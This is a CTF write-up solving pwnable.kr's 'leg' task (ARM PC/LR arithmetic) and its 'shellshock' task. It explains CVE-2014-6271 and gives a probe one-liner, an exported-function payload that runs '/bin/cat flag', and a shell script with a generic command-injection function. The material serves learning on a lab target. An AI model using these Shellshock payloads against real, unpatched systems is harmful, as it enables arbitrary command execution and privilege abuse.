In this article we review ARM assembler syntax, look at the Shellshock vulnerability, and solve the 8th and 10th tasks from the site pwnable.kr.
Organizational information
Especially for those who want to learn something new and develop in any area of information and computer security, I will write and talk about the following categories:
- PWN;
- cryptography (Crypto);
- network technologies (Network);
- reverse (Reverse Engineering);
- steganography (Stegano);
- finding and exploiting web vulnerabilities (Web).
In addition to this, I will share my experience in computer forensics, analysis of malware and firmware, attacks on wireless networks and local area networks, conducting pentests and writing exploits.
To let you know about new articles, software and other information, I have created a channel in Telegram and a group for discussing any questions in the field of information and computer security. I will also personally consider your requests, questions, suggestions and recommendations, and will answer everyone.
All information is provided for educational purposes only. The author of this document bears no responsibility for any damage caused to anyone as a result of using the knowledge and methods obtained from studying this document.
Leg task solution
We click on the first icon, labeled leg, and are told to connect via SSH with the password guest. The C source and the assembler listing of the program are also provided.

Let's download both files and go through the C source. The assembler listing uses ARM syntax; ARM assembler has been covered on Habr here and here.

In main(), a number is read from the user and compared with the sum of the return values of the three functions key1(), key2() and key3(). Let's go through them in order.

key1() copies the value of the PC register into R3. Note that when PC is read in ARM state it does not hold the address of the mov itself, and not the address of the next instruction either, but the address of the current instruction plus 8 (two instructions ahead, a legacy of the original three-stage ARM pipeline). We look at the disassembled code.

So key1() returns 0x8ce4. Let's analyze key2().

Here 0x8d08 is read from PC into R3 (key2() runs in Thumb state, where a read of PC yields the current instruction plus 4 rather than plus 8), which is then incremented by 4 and moved to R0. So key2() returns 0x8d0c. Now key3().

By analogy with the first function, key3() returns the value of the LR register. LR holds the function's return address, i.e. the address of the instruction that follows the call. Let's find where key3() is called in main() and take the address of the next instruction.

key3() returns 0x8d80. The sum of the three values is 0x8ce4 + 0x8d0c + 0x8d80 = 0x1a770, i.e. 108400 in decimal. Connect via SSH and enter it into the program.


We submit the flag and get two points.
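To make the PC-read rule explicit, here is an added example (my own code, not from the original article or from pwnable.kr) that computes the three keys in Python. The instruction addresses 0x8cdc, 0x8d04 and 0x8d7c are assumptions reconstructed from the values above: the mov in key1() sits 8 bytes before 0x8ce4, the mov in key2() runs in Thumb state 4 bytes before 0x8d08, and the bl in main() sits 4 bytes before 0x8d80. The point of the example is that the same "read PC" instruction produces a different offset depending on the instruction-set state.

```python
# Added example (not from the original article): the PC-relative arithmetic
# behind the three key() functions of the "leg" task, written out as code.
# The instruction addresses below are ASSUMPTIONS reconstructed from the
# values in the write-up (0x8ce4, 0x8d08 and 0x8d80), not copied from a listing.

ARM_PC_OFFSET = 8     # reading PC in ARM state yields current instruction + 8
THUMB_PC_OFFSET = 4   # reading PC in Thumb state yields current instruction + 4
ARM_INSN_SIZE = 4     # an ARM-state 'bl' is 4 bytes, so LR = address of bl + 4


def pc_read(insn_addr: int, thumb: bool = False) -> int:
    """Value obtained by 'mov rX, pc' executed at insn_addr."""
    return insn_addr + (THUMB_PC_OFFSET if thumb else ARM_PC_OFFSET)


def return_address(bl_addr: int) -> int:
    """Value of LR inside a function entered via an ARM-state 'bl' at bl_addr."""
    return bl_addr + ARM_INSN_SIZE


def key1(mov_pc_addr: int = 0x8CDC) -> int:
    # assumed address of 'mov r3, pc' in key1 (ARM state)
    return pc_read(mov_pc_addr)


def key2(mov_pc_addr: int = 0x8D04) -> int:
    # assumed address of 'mov r3, pc' in key2 (Thumb state), then 'adds r3, #4'
    return pc_read(mov_pc_addr, thumb=True) + 4


def key3(bl_addr: int = 0x8D7C) -> int:
    # assumed address of 'bl key3' in main (ARM state); key3 returns LR
    return return_address(bl_addr)


def leg_answer() -> int:
    """The number main() expects: key1() + key2() + key3()."""
    return key1() + key2() + key3()


if __name__ == "__main__":
    for name, fn in (("key1", key1), ("key2", key2), ("key3", key3)):
        print(f"{name}() = {fn():#x}")
    print(f"answer = {leg_answer():#x} = {leg_answer()} (decimal)")
```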

Shellshock aka Bashdoor
Shellshock (also known as Bashdoor) is a vulnerability in GNU Bash that allows arbitrary commands to be executed when bash receives specially crafted values in its environment variables. It was assigned the identifier CVE-2014-6271.
On Unix-like operating systems every process has environment variables, and a child process inherits its parent's environment. In addition to environment variables, bash maintains an internal list of functions: named blocks of shell code that a script can call. When a script launches another (child) bash, it can export not only variable values but also function definitions. An exported function is encoded as an environment variable of a special form: the value starts with empty parentheses "()", followed by the function body as a string. Every new bash instance scans its environment at startup, recognizes this format and turns the value back into an internal function definition.
The bug is that vulnerable versions of bash did not stop parsing at the closing brace of the function body: any commands that followed it in the variable's value were executed immediately, during startup, before the script or command being launched ran at all. So anyone who can plant an arbitrary environment variable in a process that later starts bash (a CGI script fed attacker-controlled HTTP headers, or, as in the task below, a privileged wrapper that calls system()) gets arbitrary command execution.
The following example prints the text VULN on a vulnerable bash:
env x='() { :;}; echo VULN' bash -c "echo text"
Here bash -c "echo text" starts a new bash with x in its environment. While importing x as a function, a vulnerable bash also executes the trailing echo VULN, so the output is VULN followed by text. A patched bash prints only text (some patched builds also print a warning about ignoring the function definition attempt).
Shellshock task solution
We click on the icon labeled shellshock and are told to connect via SSH with the password guest.

After connecting we see the task banner.

Let's find out what files are on the server and what permissions we have.

Let's look at the source code.

The interesting line is the call to system(). Judging by the name of the task, the bash binary sitting next to the program, which the program invokes through system(), is the vulnerable one. By analogy with the attack described above, we want it to run the command that reads the flag:
/bin/cat flag
To do this we define a function in an environment variable, append the command after the function body, and then run the program. The name of the variable does not matter; what matters is that it is exported, so that the bash started by system() inherits it, and that the injected cat runs with whatever privileges the program itself runs with (which is why we checked the file permissions above).
export x="() { :; }; /bin/cat flag;"
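The one-liner in the Shellshock description above and the exported variable used in the task are the same technique seen from two sides: a probe and a payload. Here is an added example (my own script, not code from the original article or from pwnable.kr) that packages both: shellshock_check runs the probe against a given bash binary and reports the result as an exit status, and shellshock_inject starts a bash the way a wrapper calling system("bash -c ...") would, with an attacker-chosen function variable in its environment. The binary paths, the marker strings SHOCKED and shock_me, and the variable name x are all assumptions of the example.

```sh
#!/bin/sh
# Added example (not from the original article or the pwnable.kr task):
# probe a bash binary for CVE-2014-6271 with the same env trick as above,
# then launch it the way a wrapper calling system("bash -c ...") would,
# with an attacker-chosen function variable in its environment.

# shellshock_check [path-to-bash]
# Exit status: 0 = patched (trailing command ignored), 1 = vulnerable
# (trailing command ran), 2 = binary could not be executed.
shellshock_check() {
    bin="${1:-bash}"
    # The value of x is a function definition followed by an extra command.
    # A vulnerable bash executes that extra command while importing x.
    out=$(env x='() { :;}; echo SHOCKED' "$bin" -c 'echo probe' 2>/dev/null) || return 2
    case "$out" in
        *SHOCKED*) return 1 ;;   # the part after the function body was executed
        *probe*)   return 0 ;;   # only the -c command ran
        *)         return 2 ;;
    esac
}

# shellshock_inject <path-to-bash> <command>
# Mimics the task's wrapper: the victim bash is started with a fixed -c
# command, and the only thing we control is an exported variable whose value
# is a function definition followed by <command>. On a vulnerable bash,
# <command> runs before "shock_me" is printed; on a patched one it is ignored.
# The variable name (x) is irrelevant; the leading "() {" is what bash keys on.
shellshock_inject() {
    bin="$1"
    cmd="$2"
    env x="() { :;}; $cmd" "$bin" -c 'echo shock_me'
}

# Demo: check every bash we can see. On the task box the interesting
# comparison is the system bash against the one next to the program
# (assumed paths; adjust to whatever 'ls' showed).
for b in bash ${CANDIDATE_BASH:-/bin/bash}; do
    rc=0
    shellshock_check "$b" || rc=$?
    case $rc in
        0) echo "$b: patched (trailing command ignored)" ;;
        1) echo "$b: VULNERABLE to CVE-2014-6271" ;;
        *) echo "$b: could not be executed" ;;
    esac
done
shellshock_inject bash 'echo injected-command-ran' 2>/dev/null || true
```

On the task machine, set CANDIDATE_BASH to the path of the bash that sits next to the program before running the script; a patched system bash reports "patched" while that copy reports "VULNERABLE", which confirms the assumption made from the task name before any flag is touched.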

We submit the flag and get one more point. See you in the next article.
We are on Telegram: channel in Telegram.